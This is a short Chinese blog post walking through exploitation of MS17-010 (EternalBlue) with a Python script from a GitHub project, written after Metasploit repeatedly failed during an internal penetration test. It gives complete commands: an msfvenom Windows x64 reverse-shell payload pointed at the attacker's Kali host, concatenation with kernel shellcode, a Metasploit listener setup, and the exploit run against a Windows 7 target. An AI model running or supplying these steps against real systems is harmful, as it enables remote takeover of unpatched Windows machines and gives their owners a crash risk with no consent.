python脚本MS17-010

前言

    才想起来自己还有个博客,草率了

    原因:前段时间去做某个公司的内网渗透(打酱油的),内网中扫出了很多的MS17-010,但是msf一直打不成功 5和6的版本都试了就是不行,一度以为机器上的某个杀软打的虚拟补丁,最后小伙伴用这个py脚本打成功了,还是太相信msf了,据说有大佬用msf打ms17-010打了一个月才成功。。。。

进入正题

贴上gaylab项目地址:https://github.com/338317/MS17-010

kali:192.168.149.167

win7:192.168.149.140

过程如下:

生成msf的payload:
msfvenom -p windows/x64/shell_reverse_tcp -f raw -o shell_msf.bin EXITFUNC=thread LHOST=192.168.149.167 LPORT=4456

将生成的shellcode与提供的文件组成完整的shellcode:
cat eternalblue_kshellcode_x64.asm shell_msf.bin >>reverse_shell.bin

kali上设置监听:
use exploit/multi/handler
set payload windows/x64/shell/reverse_tcp(与上面生成shellcode的一样)
set EXITFUNC thread
set lhost 192.168.149.167
ste lport 4456
run

启动程序:
python eternalblue_exploit7.py 192.168.149.140 reverse_shell.bin
ps:eternalblue_exploit7用于低版本的windows,如:Windows 7/2008,eternalblue_exploit8用于高版本的windows,如:Windows 8/2012

成功率比较高,当然“小心蓝屏”

 

上一篇:构建之法 读书笔记02


下一篇:nmap msf sqlmap